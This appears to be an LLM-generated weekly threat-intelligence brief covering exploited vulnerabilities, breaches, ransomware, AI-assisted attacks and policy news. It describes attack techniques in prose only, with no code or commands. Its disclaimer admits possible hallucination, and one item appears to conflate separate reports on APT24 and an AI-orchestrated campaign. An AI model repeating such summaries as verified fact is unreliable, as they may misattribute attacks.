November 23, 2025

Cyber OSINT Overview, Nov 17 - Nov 23, 2025

This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.

Most Discussed Topics

  • Multiple vulnerabilities in the Linux Kernel have been a major topic, with numerous advisories detailing flaws that could allow for Denial of Service (DoS), privilege escalation, arbitrary code execution, and data manipulation. These vulnerabilities affect various distributions, including Red Hat Enterprise Linux and Ubuntu. The high frequency of these disclosures underscores the ongoing security challenges in the kernel, which forms the foundation of many enterprise and cloud systems. Attackers can exploit these issues both locally and remotely, depending on the specific flaw.
  • Critical vulnerabilities in Fortinet products, particularly FortiWeb, have been actively exploited, prompting urgent advisories and patches. Flaws like CVE-2025-64446 (authentication bypass) and CVE-2025-58034 (OS command injection) are being used in the wild to gain administrative access and execute remote code. CISA has added CVE-2025-58034 to its Known Exploited Vulnerabilities (KEV) catalog, and a Metasploit module that chains both exploits has been released. This highlights the immediate risk posed by internet-facing Fortinet appliances and the need for immediate patching and auditing for signs of compromise.
  • The use of Artificial Intelligence in cybersecurity continues to be a dominant theme, with discussions covering both its offensive and defensive applications. On the threat side, reports have emerged of AI-orchestrated espionage campaigns, AI-enhanced malware obfuscation, and the use of agentic AI to automate attacks. Conversely, the security industry is heavily investing in AI for defense, with new products like AI-driven security operations platforms, AI-powered incident response, and AI agents designed to autonomously investigate alerts. This duality highlights a growing arms race where both attackers and defenders are leveraging AI to gain an advantage.
  • Major supply chain attacks continue to impact a wide range of organizations through third-party integrations and software dependencies. The recent breach involving Salesforce and its third-party app provider Gainsight allegedly compromised data from over 200 companies, with threat actors like ShinyHunters exploiting OAuth tokens. This incident follows a similar attack pattern seen with Salesloft Drift, highlighting a systemic risk in the SaaS ecosystem. Additionally, widespread spam campaigns on package managers like npm demonstrate an evolving threat to the software supply chain, aiming to pollute the environment rather than delivering traditional malware.

Critical Vulnerabilities

  • An actively exploited authentication bypass vulnerability in Oracle Fusion Middleware’s Identity Manager (CVE-2025-61757) allows unauthenticated remote code execution. With a CVSS score of 9.8, the flaw permits attackers with network access via HTTP to completely take over the Identity Manager. CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to evidence of exploitation since at least August 2025, weeks before a patch was available. Organizations are urged to apply the October 2025 Critical Patch Update immediately.
  • Multiple actively exploited vulnerabilities in Fortinet’s FortiWeb products allow for unauthenticated remote code execution. CVE-2025-64446 (CVSS 9.1) is a path traversal flaw enabling unauthenticated attackers to create new administrator accounts. This can be chained with CVE-2025-58034 (CVSS 6.7), an authenticated OS command injection vulnerability, to achieve RCE with root privileges. Both flaws have been added to CISA’s KEV catalog, and a Metasploit module is now available, significantly lowering the barrier to exploitation.
  • An actively exploited type confusion vulnerability (CVE-2025-13223) in the V8 JavaScript engine affects Google Chrome and other Chromium-based browsers like Microsoft Edge. This high-severity flaw can be triggered by a malicious HTML page, leading to heap corruption and potentially remote code execution. Google has confirmed that an exploit exists in the wild and released updates to address it. CISA has added the vulnerability to its KEV catalog, mandating federal agencies to patch promptly.
  • Three critical vulnerabilities have been patched in SolarWinds Serv-U file transfer solution, which could allow remote code execution. The flaws include a path restriction bypass (CVE-2025-40549), a broken access control issue (CVE-2025-40548), and a logic error (CVE-2025-40547). An attacker with administrative privileges could exploit these vulnerabilities to execute arbitrary code. Although admin access is required, the high CVSS scores (9.1) indicate severe risk, particularly on non-Windows systems where service accounts may have higher privileges.
  • A critical authentication bypass vulnerability (CVE-2025-49752) has been discovered in Azure Bastion, Microsoft’s managed remote access service. This flaw allows an attacker to bypass login controls and escalate privileges to administrative levels using a single network request. The vulnerability affects all Azure Bastion deployments. Microsoft has released an emergency security patch to address this issue, and administrators are urged to apply it immediately to prevent unauthorized access to their Azure environments.
  • A severe stack-based buffer overflow vulnerability (CVE-2025-40601) in the SonicOS SSLVPN service affects certain Gen7 and Gen8 firewalls. This pre-authentication flaw, rated CVSS 7.5, allows a remote attacker to crash the firewall and cause a Denial-of-Service condition. While not known to be actively exploited, its public disclosure increases the risk of attacks. SonicWall has released patched firmware versions and recommends restricting SSLVPN access from untrusted sources as a temporary mitigation.
  • Multiple critical vulnerabilities have been discovered in METZ CONNECT EWIO2 industrial control systems, which could allow an unauthenticated remote attacker to bypass authentication, achieve remote code execution, and gain full control of the device. The vulnerabilities include Authentication Bypass by Primary Weakness (CVE-2025-41733) and PHP Remote File Inclusion (CVE-2025-41734), both with CVSS scores of 9.8. These flaws pose a significant risk to industrial environments where these devices are deployed, and users are advised to update to firmware version 2.2.0 or newer.

Major Incidents

  • A major supply chain attack has impacted hundreds of Salesforce customers through a compromised third-party application from Gainsight. The threat actor group Scattered Lapsus$ Hunters (including ShinyHunters) claims responsibility, stating they leveraged stolen credentials to access and exfiltrate data from over 200 organizations. Salesforce has responded by revoking all active access tokens for Gainsight-published applications and temporarily removing them from its AppExchange. This incident mirrors a previous attack involving Salesloft Drift, highlighting a recurring vulnerability in the SaaS application ecosystem via third-party integrations.
  • The Cl0p ransomware group is conducting a widespread campaign exploiting a zero-day vulnerability (CVE-2025-61882) in Oracle’s E-Business Suite. The campaign has resulted in confirmed data breaches at numerous high-profile organizations, including The Washington Post, Logitech, Allianz UK, Canon, and Michelin. Cl0p is exfiltrating large volumes of data and using double-extortion tactics by leaking the stolen information to pressure victims into paying ransoms. This incident follows Cl0p’s established pattern of targeting widely-used enterprise file transfer and business management software.
  • A major outage at Cloudflare on November 18, 2025, caused widespread disruptions for many popular online services, including X (formerly Twitter), ChatGPT, and Discord. The company attributed the incident to an internal configuration error related to its bot management system, not a cyberattack. The event highlighted the internet’s heavy reliance on a few key infrastructure providers, creating a single point of failure. Security experts noted that organizations which temporarily disabled Cloudflare’s protections to restore service may have inadvertently exposed themselves to attacks during the outage window.
  • Cybersecurity firm CrowdStrike terminated an employee for sharing internal system screenshots with the ‘Scattered Lapsus$ Hunters’ hacking group. The group posted the images on Telegram, claiming they were evidence of a broader compromise. CrowdStrike stated that its systems were never breached and that the incident was the result of a suspicious insider, whose access was detected and cut off before any malicious activity could occur. The company has since referred the case to law enforcement.
  • Local law enforcement agencies in Oklahoma and Massachusetts have recently been targeted by cyberattacks, causing significant operational disruptions. The Cleveland County Sheriff’s Office in Oklahoma reported a ransomware attack affecting its internal computer systems, though emergency services remained operational. Separately, the city of Attleboro, Massachusetts, disclosed a cyberattack that knocked government and police department IT systems, including email and non-emergency phone lines, offline, forcing a reversion to paper-based procedures.
  • Food delivery service DoorDash confirmed a data breach resulting from an employee falling for a social engineering scam. The incident exposed customer contact information, including names, physical addresses, email addresses, and phone numbers. The company stated that no sensitive financial information or government-issued IDs were compromised. However, the delay between discovering the breach on October 25 and notifying customers on November 13 has drawn criticism.

Emerging Threats

  • A China-nexus threat actor, APT24, has been observed conducting a sophisticated cyberespionage campaign using agentic AI to execute attacks. According to Anthropic and Google, the group manipulated AI tools to attempt infiltration of approximately 30 global targets in technology, finance, and government. This marks one of the first documented cases of a large-scale cyberattack being executed with minimal human intervention, leveraging AI for intelligence, agency, and tool use. The campaign also utilized the BADAUDIO malware, delivered via supply chain compromises and targeted phishing.
  • A new Android banking trojan named Sturnus has been identified, capable of bypassing end-to-end encryption on messaging apps like WhatsApp, Telegram, and Signal. The malware abuses Android’s Accessibility Service to read message content directly from the screen after it has been decrypted by the legitimate application. In addition to stealing communications, Sturnus employs HTML overlays to phish for banking credentials and uses keylogging to capture PINs and passwords. The malware is currently in a testing phase but is fully functional, with initial targets identified in Southern and Central Europe.
  • Threat actors are exploiting a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, to deploy the ShadowPad backdoor. This malware, commonly used by Chinese APT groups, is being installed after initial access is gained through the WSUS flaw. Attackers have been observed using PowerShell-based tools like PowerCat to establish a foothold before downloading and executing ShadowPad via legitimate utilities like curl and certutil. This tactic targets a critical component of Windows enterprise infrastructure to facilitate espionage.
  • Nation-state actors, particularly Iran-linked groups like Imperial Kitten and MuddyWater, are increasingly conducting ‘cyber-enabled kinetic targeting.’ These operations involve using cyber intrusions to gather real-time intelligence for physical military attacks. For example, threat actors have compromised maritime Automatic Identification System (AIS) platforms and CCTV camera feeds to provide live targeting data for missile strikes. This trend dissolves the boundaries between cyber and kinetic warfare, turning compromised digital systems into direct assets for military operations.
  • The China-aligned APT group PlushDaemon has been observed using a network implant on routers to perform adversary-in-the-middle attacks. This technique allows the group to hijack legitimate software update traffic, replacing it with malicious payloads. By compromising network devices at a strategic point, PlushDaemon can intercept and modify communications covertly. This tactic is particularly effective for targeting organizations within China and highlights the threat posed by compromising core network infrastructure.
  • The Akira ransomware group continues to be a significant threat, with recent campaigns focusing on exploiting vulnerabilities in SonicWall VPNs. A recent analysis attributes 39% of incident response cases in Q3 2025 to Akira, which often gains initial access through credential stuffing and brute-force attacks against VPNs lacking multi-factor authentication. Another recent incident involved initial access through a fake CAPTCHA (ClickFix) that delivered SectopRAT malware, leading to a 42-day compromise before Akira ransomware was deployed. This highlights the group’s diverse initial access methods and persistence.
  • A new Phishing-as-a-Service (PhaaS) kit named ‘Sneaky 2FA’ is enabling attackers to conduct sophisticated Browser-in-the-Browser (BitB) attacks. This technique uses HTML and CSS to create a fake browser pop-up window that perfectly mimics legitimate login prompts, including a rendered address bar with the correct URL. This method is highly deceptive and can bypass user checks for legitimate domains. The kit allows less-skilled actors to deploy convincing phishing pages designed to steal credentials and bypass multi-factor authentication.

Regulatory and Policy Updates

  • The UK government is advancing the Cyber Security and Resilience Bill to update its Network and Information Security (NIS) regulations. This legislation aims to strengthen cybersecurity requirements for critical sectors such as water, power, and healthcare. The reform is driven by an evolving threat landscape, technological advancements, and identified shortcomings in the original 2018 regulations. The bill will expand the scope of NIS to cover new technologies like data centers and managed service providers, addressing the increasing frequency and sophistication of threats to the UK’s critical national infrastructure.
  • The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a critical US law providing liability protections for companies sharing cyber threat intelligence, has received a short-term extension. The law had lapsed in September 2025, raising concerns about its impact on information sharing between the private sector and the federal government. While the extension provides temporary relief, cybersecurity leaders are advocating for a permanent or long-term reauthorization to ensure the stability of public-private threat intelligence collaboration.
  • The FCC is set to rescind Biden-era cybersecurity regulations for telecommunications providers that were implemented in response to the Salt Typhoon cyberespionage campaign. The rules required telecom providers to protect their networks from unauthorized interception and to certify their cyber risk management plans. The FCC majority argues the rules are ineffective and an overreach of authority, while dissenting voices warn that the reversal removes a critical regulatory backstop and lets providers off the hook for security lapses.
  • The UK government has announced a £21 million investment to advance the adoption of CHERI (Capability Hardware and Enhanced RISC Instructions) technology. This hardware-based solution is designed to mitigate memory safety vulnerabilities, which are a common root cause of many cyberattacks. The funding will support companies in integrating CHERI-enabled hardware into commercial products and developing the necessary software tools, aiming to build more resilient systems from the ground up.

Security Operations

  • CISA and international partners have released a guide to help Internet Service Providers (ISPs) and network defenders combat Bulletproof Hosting (BPH) providers, which knowingly lease infrastructure to cybercriminals. The guide provides recommendations such as curating malicious resource lists, implementing traffic filtering, and enhancing intelligence sharing to degrade the effectiveness of BPH infrastructure. This initiative aims to disrupt the ecosystem supporting activities like ransomware, phishing, and malware delivery by forcing criminals onto legitimate platforms that comply with legal processes.
  • The CISA Known Exploited Vulnerabilities (KEV) catalog continues to be a critical tool for prioritizing patching efforts. This week, CISA added several actively exploited vulnerabilities, including an Oracle Fusion Middleware flaw (CVE-2025-61757), a Google Chromium V8 vulnerability (CVE-2025-13223), and a Fortinet FortiWeb command injection bug (CVE-2025-58034). These additions mandate that U.S. federal agencies remediate the flaws by specified deadlines. CISA strongly urges all organizations to use the KEV catalog as part of their vulnerability management practice to reduce exposure to active threats.
  • A new integration between Proofpoint Satori and Microsoft Security Copilot is now generally available, enhancing security operations with real-time threat intelligence. The Proofpoint Satori agent allows defenders to query the exploitation status of specific CVEs directly within the Security Copilot interface. By drawing on data from sources like the EPSS, CISA’s KEV catalog, and Proofpoint’s own sensor network, the agent helps security teams accurately identify and prioritize actively exploited vulnerabilities, accelerating remediation and improving risk-based vulnerability management.
  • The Financial Services Information Sharing and Analysis Center (FS-ISAC) in the UK has become the new steward of the UK’s Financial Sector Cyber Collaboration Centre (FSCCC). This transition aims to expand threat intelligence sharing and strengthen incident response capabilities across the UK’s financial sector. By integrating the FSCCC’s public-private partnership model with FS-ISAC’s global intelligence network, the collaboration will provide a more unified and effective defense against cyber threats targeting financial institutions.
  • GreyNoise has introduced query-based blocklists, allowing security teams to dynamically block malicious IP addresses in real-time. This feature enables users to turn any GreyNoise Query Language (GNQL) query into a live, continuously updated feed for firewalls and other enforcement points. As attacker infrastructure rapidly changes, this capability provides a more responsive and configurable approach to perimeter defense compared to traditional static blocklists, helping organizations automate the blocking of activity tailored to their specific threat model.

Wins

  • The U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its lawsuit against SolarWinds and its Chief Information Security Officer (CISO), Timothy Brown. The suit alleged that the company had defrauded investors by misrepresenting its cybersecurity posture prior to the 2020 supply chain attack. This dismissal is seen as a significant win for the cybersecurity community, easing concerns that CISOs could face personal liability for corporate security failures and removing a potential chilling effect on security disclosures.
  • In a coordinated international effort, the U.S., U.K., and Australia have imposed sanctions on Russia-based bulletproof hosting (BPH) provider Media Land and its affiliates. The company is accused of providing infrastructure to major ransomware groups like LockBit, BlackSuit, and Play, as well as supporting other cybercrime operations. This action targets the core enablers of the cybercrime ecosystem, aiming to disrupt their ability to operate and make it harder for threat actors to launch attacks with impunity. The Five Eyes nations also released a guide for network defenders to mitigate risks from BPH providers.
  • The co-founders of the Samourai Wallet cryptocurrency mixing service have been sentenced to prison for operating an unlicensed money-transmitting business that laundered over $237 million in criminal proceeds. The platform’s features, such as ‘Whirlpool’ and ‘Ricochet,’ were designed to obscure transaction origins, making it a favored tool for cybercriminals involved in ransomware, darknet markets, and fraud. The sentencing represents a significant blow to the infrastructure that enables the financial side of cybercrime.
  • Two UK teenagers, alleged members of the Scattered Spider threat group, have been arrested and charged in connection with the 2024 cyberattack on Transport for London (TfL). The individuals, Thalha Jubair and Owen Flowers, pleaded not guilty to charges under the Computer Misuse Act. This legal action represents a key step in holding members of the prolific, English-speaking cybercrime collective accountable for high-profile attacks that have caused significant disruption and financial losses.

Disclaimer

The summaries in this brief are generated autonomously by a LLM based on provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

The brief is created in collaboration with BlackStork and is based on a free template.

Reach out if you have questions or suggestions.